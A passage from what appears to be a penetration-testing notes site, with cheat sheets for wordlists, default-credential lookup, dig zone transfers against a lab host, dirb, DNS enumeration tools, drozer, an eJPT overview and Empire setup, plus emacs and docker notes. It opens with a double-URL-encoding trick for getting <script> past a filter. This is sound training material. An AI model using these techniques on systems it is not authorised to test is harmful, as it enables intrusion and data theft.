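        A classic case is double URL encoding: a filter that decodes only once sees %253Cscript%253E decode to the harmless-looking %3Cscript%3E, while a later component decodes it again into <script>. A sketch with Python's urllib:
    
        python3 -c 'from urllib.parse import quote; print(quote(quote(\"<script>\", safe=\"\"), safe=\"\"))'\n# %253Cscript%253E\n
    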

    "},{"location":"dictionaries/","title":"Dictionaries","text":"","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#lists-of-my-most-used-dictionaries","title":"Lists of my most used dictionaries","text":"Dictionary Link Description Intended for Dotdotpwn https://github.com/wireghoul/dotdotpwn It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Traversal directory Payload all the things https://github.com/swisskyrepo/PayloadsAllTheThings many different resources and cheat sheets for payload generation and general methodology. Rockyou /usr/shared/wordlists/rockyou.txt.gz RockYou was a company that developed widgets for MySpace and implemented applications for various social networks and Facebook. Since 2014, it has engaged primarily in the purchases of rights to classic video games; it incorporates in-game ads and re-distributes the games. User agents Seclist Intended to bypass rate limiting (in an API) User-agent headers Windows Files My dictionaty repo To read interesting files from windows machines Intended for information disclosure Default Credential Cheat sheets https://github.com/ihebski/DefaultCreds-cheat-sheet Install and run \"python3.11 creds search <service>\"","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#installing-wordlists-in-your-kali","title":"Installing wordlists in your kali","text":"
    # This package contains the rockyou.txt wordlist and has an installation size of 134 MB.\nsudo apt install wordlists\n

    You will be adding:

    /usr/share/wordlists\n|-- amass -> /usr/share/amass/wordlists\n|-- brutespray -> /usr/share/brutespray/wordlist\n|-- dirb -> /usr/share/dirb/wordlists\n|-- dirbuster -> /usr/share/dirbuster/wordlists\n|-- dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt\n|-- fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt\n|-- fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists\n|-- john.lst -> /usr/share/john/password.lst\n|-- legion -> /usr/share/legion/wordlists\n|-- metasploit -> /usr/share/metasploit-framework/data/wordlists\n|-- nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst\n|-- rockyou.txt.gz\n|-- seclists -> /usr/share/seclists\n|-- sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt\n|-- wfuzz -> /usr/share/wfuzz/wordlist\n`-- wifite.txt -> /usr/share/dict/wordlist-probable.txt\n
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#installing-seclist","title":"Installing seclist","text":"
    git clone https://github.com/danielmiessler/SecLists\n\nsudo apt install seclists -y\n
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#dictionary-generators","title":"Dictionary generators","text":"
    • crunch.
    • cewl.
    • Common User Password Profiler: CUPP.
    • Username Anarchy.
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#more-dictionaries","title":"More dictionaries","text":"
    • Dictionaries for cracking passwords: https://wiki.skullsecurity.org/index.php/Passwords.
        • Wordlist from wfuzz: https://github.com/xmendez/wfuzz/tree/master/wordlist.
    
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#default-credentials","title":"Default credentials","text":"

        Install the \"creds\" tool from: https://github.com/ihebski/DefaultCreds-cheat-sheet
    

    pip3 install defaultcreds-cheat-sheet\n\npython3.11 creds search tomcat\n
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dig/","title":"dig","text":"

    References: dig (https://linux.die.net/man/1/dig)

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#footprinting-dns-with-dig","title":"Footprinting DNS with dig","text":"
    # Querying: A Records for a Subdomain\n dig a www.example @$ip\n # here, $ip refers to ip of DNS server\n\n# Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n# here, $ip refers to ip of DNS server\n\n# View all available records\ndig any example.com @$ip\n # here, $ip refers to ip of DNS server. The more recent RFC8482 specified that `ANY` DNS requests be abolished. Therefore, we may not receive a response to our `ANY` request from the DNS server.\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n\n# Querying: PTR Records for an IP Address\ndig -x $ip @1.1.1.1\n# You can also facilitate a range:\ndig -x 192.168 @1.1.1.1\n\n# Querying: TXT Records\ndig txt example.com @$ip\n\n# Querying: MX Records\ndig mx example.com @1.1.1.1\n
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#dig-axfr","title":"dig axfr","text":"

        dig is a DNS lookup utility, but combined with \"axfr\" it is used to perform DNS zone transfers. The procedure is abbreviated AXFR (Asynchronous Full Transfer Zone), which is the name of the protocol used during a DNS zone transfer.
    

        Basically, in a DNS query a client provides a human-readable hostname and the DNS server responds with an IP address.
    

    Quick syntax for zone transfers:

        dig axfr actualtarget @nameserver\n\n# You can also request the transfer of a reverse DNS zone\ndig axfr -x 192.168 @$ip\n
    
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#what-is-a-dns-zone","title":"What is a DNS zone?","text":"

        DNS servers host zones. One example of a DNS zone might be example.com and all its subdomains. However, secondzone.example.com can also be a separate zone.
    

    A zone file is a text file that describes a DNS zone with the BIND file format. In other words it is a point of delegation in the DNS tree. The BIND file format is the industry-preferred zone file format and is now well established in DNS server software. A zone file describes a zone completely.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#why-is-dns-zone-transfer-needed","title":"Why Is DNS Zone Transfer Needed","text":"

    DNS is a critical service. If a DNS server for a zone is not working and cached information has expired, the domain is inaccessible to all services (web, mail, and more). Therefore, each zone should have at least two DNS servers. For more critical zones, there may be even more.

        However, a zone may be large and may require frequent changes. If you manually edit zone data on each server separately, it takes a lot of time and there is a lot of potential for mistakes. This is why DNS zone transfer is needed.
    

    You can use different mechanisms for DNS zone transfer but the simplest one is AXFR (technically speaking, AXFR refers to the protocol used during a DNS zone transfer). It is a client-initiated request. Therefore, you can edit information on the primary DNS server and then use AXFR from the secondary DNS server to download the entire zone.

    Synchronization between the servers involved is realized by zone transfer. Using a secret key rndc-key, which we have seen initially in the default configuration, the servers make sure that they communicate with their own master or slave. A DNS server that serves as a direct source for synchronizing a zone file is called a master. A DNS server that obtains zone data from a master is called a slave. A primary is always a master, while a secondary can be both a slave and a master. For some Top-Level Domains (TLDs), making zone files for the Second Level Domains accessible on at least two servers is mandatory.

    Initiating an AXFR zone-transfer request from a secondary server is as simple as using the following dig commands, where zonetransfer.me is the domain that we want to initiate a zone transfer for. First, we will need to get the list of DNS servers for the domain.

    dig axfr example.htb @$ip\n

        If the administrator used a subnet for the allow-transfer option for testing purposes (or as a workaround solution), or set it to any, anyone could query the entire zone file from the DNS server.
    

    If misconfigured and left unsecured, this functionality can be abused by attackers to copy the zone file from the primary DNS server to another DNS server. A DNS Zone transfer can provide penetration testers with a holistic view of an organization's network layout. Furthermore, in certain cases, internal network addresses may be found on an organization's DNS servers.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#htb-machines","title":"HTB machines","text":"

    Some HackTheBox machines exploits DNS zone transfer:

        In the example of the Friendzone machine, the web page accessible on port 80 exposes an email address in which a different domain can be spotted. Port 53 is also open, which is an indicator of a possible DNS zone transfer.
    

        In Friendzone, we request zone transfers for all the zones spotted by the different scans:
    

        # friendzone.red was spotted in the nmap scan. Requesting a zone transfer for friendzone.red from 10.129.228.87\ndig axfr friendzone.red @10.129.228.87\n\n# Also friendzoneportal.red was spotted in the email that appeared on http://10.129.228.87. Requesting a zone transfer for friendzoneportal.red from 10.129.228.87:\ndig axfr friendzoneportal.red @10.129.228.87\n
    
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dirb/","title":"dirb - A web content enumeration tool","text":"

    DIRB is a web content fingerprinting tool. It scans the server for directories using a dictionary file.

    Scan the web server (http://192.168.1.224/) for directories using a dictionary file (/usr/share/wordlists/dirb/common.txt):
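    
        dirb http://192.168.1.224/ /usr/share/wordlists/dirb/common.txt\n
    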

    ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirb/#dictionaries","title":"Dictionaries","text":"

    See dictionaries in this repo.

    Path to default dictionary: /usr/share/dirb/wordlists/

    ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirb/#basic-commands","title":"Basic commands","text":"
        dirb <HOST> /path/to/dictionary.txt -o results.txt\n# No flag needed to specify path to dictionary.\n# -o: to save the results in an output file\n# -a: agent application. In case that the app checks out this header (use it with https://useragentstring.com/pages/useragentstring.php)\n# -p: for indicating a proxy (for instance, Burp: dirb <target host or IP> -p http://127.0.0.1:8080)\n# -c: it adds a cookie (dirb <target host or IP> -c \u201cMYCOOKIE: ashdkjashdjkas\u201d)\n# -H: it adds a customized header (dirb <target host or IP> -H \u201cMYHEADER: Mycontent\u201d)\n# -r: don\u2019t search recursively in directories\n# -z: it adds a millisecond delay to avoid excessive flooding\n# -S: silent mode. It doesn\u2019t show tested words.\n# -X: It allows us to specify extensions (dirb <target host or IP> -X \u201c.php, .bak\u201d). Appends each word with this extension\n# -x: It allows us to use a file with extensions (dirb <target host or IP> -x extensionfile.txt). Appends each word with the extensions specified in the file\n
    
    ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirty-cow/","title":"Dirty COW (Copy On Write)","text":"

    A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.

    An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

    This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

    ","tags":["pentesting","linux","privileges escalation"]},{"location":"dirty-cow/#exploitation","title":"Exploitation","text":"

    List of PoCs: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs.

    ","tags":["pentesting","linux","privileges escalation"]},{"location":"dirty-cow/#resources","title":"Resources","text":"
    • https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails.
    ","tags":["pentesting","linux","privileges escalation"]},{"location":"django-pentesting/","title":"django pentesting","text":"

    The following Github repository describes OWASP Top10 for Django: https://github.com/boomcamp/django-security

    ","tags":["python","django","pentesting","web pentesting"]},{"location":"dnscan/","title":"dnscan - A DNS subdomain scanner","text":"

    dnscan is a python wordlist-based DNS subdomain scanner.

    The script will first try to perform a zone transfer using each of the target domain's nameservers.

    If this fails, it will lookup TXT and MX records for the domain, and then perform a recursive subdomain scan using the supplied wordlist.

    ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#installation","title":"Installation","text":"

    Requirements: dnscan requires Python 3, and the netaddr (version 0.7.19 or greater) and dnspython (version 2.0.0 or greater) libraries.

    git clone https://github.com/rbsec/dnscan\ncd dnscan\npip install -r requirements.txt\n
    ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#usage","title":"Usage","text":"
    dnscan.py (-d \\<domain\\> | -l \\<list\\>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
    ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#optional-arguments","title":"Optional Arguments","text":"
    -w --wordlist <wordlist>                  Wordlist of subdomains to use\n-t --threads <threadcount>                Threads (1 - 32), default 8\n-6 --ipv6                                 Scan for IPv6 records (AAAA)\n-z --zonetransfer                         Perform zone transfer and exit\n-r --recursive                            Recursively scan subdomains\n   --recurse-wildcards                    Recursively scan wildcards (slow)\n\n-m --maxdepth                             Maximum levels to scan recursively\n-a --alterations                          Scan for alterations of subdomains (slow)\n-R --resolver <resolver>                  Use the specified resolver instead of the system default\n-L --resolver-list <file>                 Read list of resolvers from a file\n-T --tld                                  Scan for the domain in all TLDs\n-o --output <filename>                    Output to a text file\n-i --output-ips <filename>                Output discovered IP addresses to a text file\n-n --nocheck                              Don't check nameservers before scanning. Useful in airgapped networks\n-q --quick                                Only perform the zone transfer and subdomain scans. Suppresses most file output with -o\n-N --no-ip                                Don't print IP addresses in the output\n-v --verbose                              Verbose output\n-h --help                                 Display help text\n

    Custom insertion points can be specified by adding %% in the domain name, such as:

    dnscan.py -d dev-%%.example.org\n
    ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnsenum/","title":"dnsenum - A tool to enumerate DNS","text":"

        Multithreaded Perl script to enumerate DNS information of a domain and to discover non-contiguous IP blocks.
    

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsenum/#installation","title":"Installation","text":"

    Download from the github repo: https://github.com/fwaeytens/dnsenum.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsenum/#basic-usage","title":"Basic usage","text":"

    Used for active fingerprinting:

    dnsenum domain.com\n

        One cool thing about dnsenum is that it can perform DNS zone transfers, like [dig](dig.md).
    

    It performs DNS brute force with /usr/share/dnsenum/dns.txt.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnspy/","title":"DNSpy - A .NET decompiler for windows","text":"

    Download it from: https://github.com/dnSpy/dnSpy/releases

        You can use dnSpy to determine whether an application is a .NET executable or native code. If dnSpy can decompile the .exe file, it is a .NET executable.
    

    Finding a .NET decompiler for Linux

        There are well-known decompilers out there. For Windows you have dnSpy and many more. On Linux you have the open-source ILSpy, but its installation requires some dependencies; alternatively, Windows tools can be run under Wine.
    

    ","tags":["pentesting"]},{"location":"dnsrecon/","title":"DNSRecon","text":"

        Preinstalled on Kali Linux: dnsrecon is a simple Python script that enables you to gather DNS-oriented information on a given target.
    

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsrecon/#basic-usage","title":"Basic usage","text":"
    dnsrecon -d example.com\n
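    
        dnsrecon also supports specific scan types via -t; for instance, attempting a zone transfer (axfr):
    
        dnsrecon -d example.com -t axfr\n
    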
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"docker/","title":"docker","text":"","tags":["docker"]},{"location":"docker/#installation","title":"Installation","text":"

        First, make sure that Docker Engine, Docker Compose and nginx are installed:
    

    sudo apt install docker docker-compose nginx\n

    Depending on the image you are going to compose you will need nginx or other dependencies.

    ","tags":["docker"]},{"location":"docker/#basic-commands","title":"Basic commands","text":"
        # show all processes \ndocker ps -a\n\n# Actions on dockerInstance/PID/part of id if unique: restart, stop, start, status\nsudo docker <restart/stop/start/status> <nameOfDockerInstance/PID/partOfIDifUnique>\n\n# Create the first docker instance: Hello, world! It gets the setting from docker.hub\nsudo docker run hello-world\n# run: build and deploy an instance\n# by default, docker saves everything in /var/lib/docker\n\n# Execute commands in an already running docker instance. You can execute a single command or a terminal. \nsudo docker run -it <image> <command>\n# image: for instance, debian\n# <command>: for instance, echo lala; or an interactive bash terminal with /bin/bash\n
    
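    
        As a quick illustration (image name and host port chosen arbitrarily for this sketch), running a detached nginx container with a published port:
    
        # Run nginx in the background (-d) and map host port 8080 to container port 80\nsudo docker run -d -p 8080:80 --name web nginx\n\n# Check that it is up\ncurl -i http://localhost:8080\n\n# Stop and remove the container\nsudo docker stop web && sudo docker rm web\n
    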
    ","tags":["docker"]},{"location":"dotpeek/","title":"dotPeek - A tool for decompiling","text":"

    dotPeek is a tool by JetBrains.

    "},{"location":"dotpeek/#installation","title":"Installation","text":"

    Download from: https://www.jetbrains.com/es-es/decompiler/download/#section=web-installer

    "},{"location":"dread/","title":"Microsoft DREAD","text":"

        DREAD is a risk assessment system developed by Microsoft to help IT security professionals evaluate the severity of security threats and vulnerabilities. It performs a risk analysis using a 10-point scale to assess the severity of security threats and vulnerabilities. With this, we calculate the risk of a threat or vulnerability based on five main factors (a worked example follows the list):
    

    • Damage Potential
    • Reproducibility
    • Exploitability
    • Affected Users
    • Discoverability
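    
        Each factor is commonly rated on a 0-10 scale, and the overall risk is taken as the average of the five values. A quick illustrative calculation (the scores are made up for the example):
    
        Risk = (Damage + Reproducibility + Exploitability + Affected Users + Discoverability) / 5\n\n# Example with illustrative scores:\nRisk = (8 + 9 + 7 + 9 + 6) / 5 = 7.8  -> High\n
    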
    ","tags":["dread","cvss"]},{"location":"drozer/","title":"drozer - A security testing framework for Android","text":"

    drozer (formerly Mercury) is the leading security testing framework for Android.

    drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

    drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering.

    ","tags":["mobile pentesting"]},{"location":"drozer/#installation","title":"Installation","text":"

    Instructions from: https://github.com/WithSecureLabs/drozer

    Also, you can download it from: https://github.com/FSecureLABS/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

    adb install drozer-agent-2.3.4.apk\npip install twisted\n

    Prerequisites: JDK 1.6, python2.7, Android SDK, adb, java 1.6.

    Note: Java 1.6 is mandatory since Android bytecode is only compliant to version 1.6 and no higher.

    1. Install genymotion and get a device, for instance a samsung galaxy S6, running in the virtualbox.
        2. Go to the drozer app and turn on the server. You will get a message in the app saying that port 31415 is now on.
    
    3. From the terminal, we redirect the port with:
      adb connect IPDevice:PORT\nadb forward tcp:31415 tcp:31415\n
        4. Now we connect to the drozer console:
    
      drozer console connect\n

    For this to work, we need to have:

    • device set on Host-Only + Nat mode.
    • Kali set on Host-Only + Nat mode.

    Also, connections need to be running on the same interfaces (ethn).

    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands","title":"Basic commands","text":"

    These commands run on a drozer terminal:

    # Display the apps installed on the device.\nrun app.package.list\n\n# Display only the apps with identifier lala\nrun app.package.list -f lala\n\n# Log debug information\nlog.d\n\n# Log system information\nlog.i\n\n# Log error information\nlog.e\n
    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-packages","title":"Basic commands on packages","text":"
    # Display available commands.\nrun + TAB\n\n# Show the manifest of a given app.\nrun app.package.manifest nameOfApp\n\n# Show generic information about the app\nrun app.package.info -a nameOfApp\n\n# Display surface, a resume of activities, component providers, services, exported activities and if it is debugable.\nrun app.package.attacksurface nameOfApp\n
    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-activities","title":"Basic commands on activities","text":"
    # Show generic information about the activities\nrun app.activity.info -a nameOfApp\n\n# Display an activity on a device\nrun app.activity.start --component nameOfApp nameOfApp.nameOfActivity\n
    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-providers","title":"Basic commands on providers","text":"
        # Display existing providers.\nrun app.provider.info -a nameOfApp\n\n# Display the location of providers. It uses the content:// protocol\nrun app.provider.finduri nameOfApp\n\n# Display the database information of the provider.\nrun app.provider.query uriOfProvider\n
    
    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-scanners","title":"Basic commands on scanners","text":"
    # To see all tests and scans you can run with drozer on your app.\nrun scanner. +TAB\n\n# Test the app to see if it is vulnerable to an injection.\nrun scanner.provider.injection -a nameOfApp\n\n# Check out if the App is vulnerable to a traversal attack\nrun scanner.provider.traversal -a nameOfApp\n
    ","tags":["mobile pentesting"]},{"location":"echo-mirage/","title":"Echo Mirage","text":"","tags":["windows","thick applications","traffic tool"]},{"location":"echo-mirage/#installation","title":"Installation","text":"

    Download from

    Google Drive:

    https://drive.google.com/open?id=1JE70HH-CNd_VIl190sheL72w3P5dYK58

    Mega.nz:

    https://mega.nz/#!lRtUzApC!2hBLDnNiOZJ87Z9kmgFfwDLDvWZUBixGpZrTVtuYHSI

    ","tags":["windows","thick applications","traffic tool"]},{"location":"ejpt/","title":"eJPT - eLearnSecurity Junior Penetration Tester Cheat Sheet","text":"

    What is eJPT? The eJPT is\u00a0a 100% hands-on certification for penetration testing and essential information security skills.

    I'm more than happy to share my personal cheat sheet of the #eJPT Preparation exam.

    ","tags":["pentesting"]},{"location":"ejpt/#subdomain-enumeration","title":"Subdomain enumeration","text":"Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Sublist3r Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. amass In depth DNS Enumeration and network mapping.","tags":["pentesting"]},{"location":"ejpt/#footprinting-scanning","title":"Footprinting & Scanning","text":"Tool + Cheat sheet What it does ping ping works by sending one or more special ICMP packets (Type 8 - echo request) to a host. If the destination host replies with ICMP echo reply packets, then the host is alive. fping Linux tool which is an improved version of the ping utility. nmap Network Mapper is an open source tool for network exploration and security auditing. Free and open-source scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packages and analyzing the responses. p0f P0f is a tool that utilizes an array of sophisticated, purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications (often as little as a single normal SYN) without interfering in any way. masscan Masscan was designed to deal with large networks and to scan thousands of Ip addresses at once. It\u2019s faster than nmap but probably less accurate.","tags":["pentesting"]},{"location":"ejpt/#enumeration-tools","title":"Enumeration tools","text":"Tool + Cheat sheet URL dirb DIRB is a web content fingerprinting tool. It scans the web server for directories using a dictionary file feroxbuster FEROXBUSTER is a web content fingerprintinf tool that uses brute force combined with a wordlist to search for unlinked content in target directories. httprint HTTPRINT is a web server fingerprinting tool. It identifies web servers and detects web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. wpscan WPSCAN is a wordpress security scanner.","tags":["pentesting"]},{"location":"ejpt/#dictionaries","title":"Dictionaries","text":"

    List of dictionaries.

    Tool + Cheat sheet What it does crunch Generate combinations of words and manglings to be used later off as attacking dictionaries.","tags":["pentesting"]},{"location":"ejpt/#vulnerability-assessment-scanners","title":"Vulnerability assessment: scanners","text":"Available scanners + Cheat sheet URL Nessus https://www.tenable.com/downloads/nessus OpenVAS https://www.openvas.org/ Nexpose https://www.rapid7.com/products/nexpose/ GFOLAnGuard https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard","tags":["pentesting"]},{"location":"ejpt/#toolstecniques-for-network-exploitation","title":"Tools/tecniques for network exploitation","text":"Tool + Cheat sheet What it does netcat netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. openSSL OpenSSL is a software library for applications that provide secure communications over computer networks against eavesdropping or need to identify the party at the other end. It is widely used by Internet servers, including the majority of HTTPS websites. Registry creation Registries in the victim machine may be used to save a connection to the attacker machine.","tags":["pentesting"]},{"location":"ejpt/#web-pentesting","title":"Web pentesting","text":"Vulnerability / Technique What it does Tool Backdoors with netcat Buffer Overflow attacks A buffer is an area in the RAM (Random Access Memory) reserved for temporary data storage. If a developer does not enforce buffer\u2019s limits, an attacker could find a way to write data beyond those limits. Remote Code Execution RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system. XSS attack - Cross-site Scripting attack Cross-Site Scripting attacks or XSS attacks enable attackers to inject client-side scripts into web pages. This is done through an URL than the attacker sends. Crafted in the URL, this js payload is injected. xsser SQL injection SQL stands for Structure Query Language. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. sqlmap","tags":["pentesting"]},{"location":"ejpt/#password-cracker","title":"Password cracker","text":"Tool + Cheat sheet What it does ophcrack Ophcrack is a free Windows password cracker based on rainbow tables. It is a efficient implementation of rainbow tables. It comes with a Graphical User Interface and runs on multiple platforms. hashcat Hashcat is a password recovery tool. It had a proprietary code base until 2015, but was then released as open source software. Versions are available for Linux, OS X, and Windows. wikipedia. John the Ripper John the Ripper is one of those tools that can be used for several things: hash cracker and dictionary attack. hydra Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol.","tags":["pentesting"]},{"location":"ejpt/#dictionary-attacks","title":"Dictionary attacks","text":"Tool + Cheat sheet What it does John the Ripper John the Ripper is one of those tools that can be used for several things: hash cracker and dictionary attack. hydra Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol.","tags":["pentesting"]},{"location":"ejpt/#windows","title":"Windows","text":"

    Introduction about NetBIOS.

        Vulnerability / Technique What it does Tools Null session attack This attack exploits an authentication vulnerability for Windows Administrative Shares. Manual attack, Winfo, enum, enum4linux, samrdump.py, nmap script Arp poisoning This attack is performed by sending gratuitous ARP replies. arpspoof Remote Code Execution RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system. Burpsuite and Wireshark","tags":["pentesting"]},{"location":"ejpt/#linux","title":"Linux","text":"
    

    Spawn a shell. msfvenom.

    ","tags":["pentesting"]},{"location":"ejpt/#lateral-movements","title":"Lateral movements","text":"

    Lateral movements

    ","tags":["pentesting"]},{"location":"emacs/","title":"emacs - A text editor... and more","text":""},{"location":"emacs/#syntax","title":"Syntax","text":"

    Before starting, it is convenient to consider the syntax we'll be using:

    C-<char> \nWe'll keep press CTRL key and at the same time a character.\n\nM-<char>\nWe'll keep press ALT key and at the same time a character.\n\nESC <char>\nWe'll press ESC key, and after that we'll press the character.\n\nC <char>\nWe'll press CTRL key, and after that we'll press the character.\n\nM <char>\nWe'll press ALT key, and after that we'll press the character.\n
    "},{"location":"emacs/#basic-commands","title":"Basic commands","text":"

        Disclaimer: while creating this cheat sheet, I've realized that I'm totally in love with emacs, meaning this article is full of biased comments. Neutrality is overrated.
    

    "},{"location":"emacs/#session-and-process-management","title":"Session and process management","text":"
        # Close session. It will ask if you want to save the buffers.\nC-x C-c\n\n# Cancel a running process.\nC-g\n\n# Remove all other open windows and expand the window that contains the active cursor position \nC-x 1\n
    
    "},{"location":"emacs/#cursor-movement","title":"Cursor Movement","text":"

        Unlike the vim or neovim editors, \"cursor mode\" and \"insert mode\" go together in emacs, meaning you can insert any character wherever the cursor is, without having to switch from one mode to another.
    

        There is also a small but significant difference: emacs includes a blank character at the end of the line. This may sound very vague, but it allows you to move in a more natural and human way from the beginning of one line to the end of the previous one. Just this silly feature makes me love emacs more than vim (#sorryVimDudes).
    

        # Go to previous line.\nC-p\n\n# Go to next line.\nC-n\n\n# Move cursor position one character forwards.\nC-f\n\n# Move cursor position one character backwards.\nC-b\n\n# Go to the beginning of the line.\nC-a\n\n# Go to the end of the line.\nC-e\n\n# Go to the beginning of the sentence.\nM-a\n\n# Go to the end of the sentence.\nM-e\n\n# Go to the beginning of the file.\nM-<\n\n# Go to the end of the file.\nM->\n
    
    "},{"location":"emacs/#deleting","title":"Deleting","text":"
    # Remove following word\nM-d\n\n# Remove previous word\nM-DEL\n\n# Remove from the cursor position to the end of the line\nC-k\n\n# Remove from the cursor position to the end of the sentence\nM-k\n\n# Select from here to the position where you've moved the cursor. \nC-Space\nDEL\n
    "},{"location":"emacs/#clipboard","title":"Clipboard","text":"

        Another cool functionality in emacs is that the clipboard has history. If having a blank character at the end of the line wasn't enough to make you fall in love with emacs, now you have no excuses. The ability to navigate through the history of yanked text turns emacs into exactly what you have been dreaming of.
    

        # Paste (yank) the most recently killed text.\nC-y\n\n# Right after a yank, browse the clipboard history to older yanked text. \nM-y\n
    
    "},{"location":"emacs/#undo","title":"Undo","text":"
    # Three ways to undo an action text related (non cursor position related).\nC-/\nC-_\nC-x u\n
    "},{"location":"emacs/#buffers","title":"Buffers","text":"

    Also, browsing your buffers in emacs is insanely easy. One more reason to love emacs.

    The emacs autosaved file has this syntax:

    #nameOfAutosavedFile;\n
        # List your buffers.\nC-x C-b\n\n# Get rid of the list with all buffers.\nC-x 1\n\n# Go to a specific buffer (normally all of them are wrapped up between * *).\nC-x b <nameOfBuffer>\n\n# Enter a minibuffer\nM-x\n\n# Get out of a minibuffer (in this case C-g doesn't work).\nESC ESC ESC\n
    
    "},{"location":"emacs/#file-management","title":"File management","text":"
        # Save in bulk. It will ask if you want to save your buffers one by one.\nC-x s\n\n# To recover a file:\n# Open the non saved file with\nemacs nameOfNonSavedFile\nM-x recover-file RETURN\nYes ENTER\n
    
    "},{"location":"emacs/#modes","title":"Modes","text":"
    # Change to fundamental mode.\nM-x fundamental-mode\n\n# Change to text mode.\nM-x text-mode\n\n# Activate or deactivate autofill mode.\nM-x auto-fill-mode RETURN\n
    "},{"location":"emacs/#search","title":"Search","text":"
    # Search for an expression forwards.\nC-s\n\n# Search for an expression backwards.\nC-r\n
    "},{"location":"emacs/#windows-management","title":"Windows management","text":"

        Only a few things can compete with the beauty of the i3 window manager, and in my opinion emacs is not as neat and direct as i3. Still, even though emacs is not exactly a window management tool, it manages its windows in a quite easy way:
    

    # Divide vertically current window in two.\nC-x 2\n\n# Divide horizontally current window in two.\nC-x 3\n\n# Move cursor position to the other window.\nC-x o\n\n# Open a file in a different window below.\nC-x 4 C-f nameOfFile\n\n# Create a new and independent window.\nM-x make-frame\n\n# Remove/close the window.\nM-x delete-frame\n
    "},{"location":"emacs/#help","title":"Help","text":"
        # Show documentation about a key sequence (and the command bound to it).\nC-h k <key>\n\n# Describe a command.\nC-h x command\n\n# Open available manuals.\nC-h i\n
    
    "},{"location":"empire/","title":"Empire","text":"

    Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.

        Basically, you can run PowerShell agents without having to use powershell.exe.
    

    ","tags":["post exploitation"]},{"location":"empire/#installation","title":"Installation","text":"
    git clone https://github.com/EmpireProject/Empire.git\nEmpire/setup/install.sh\n
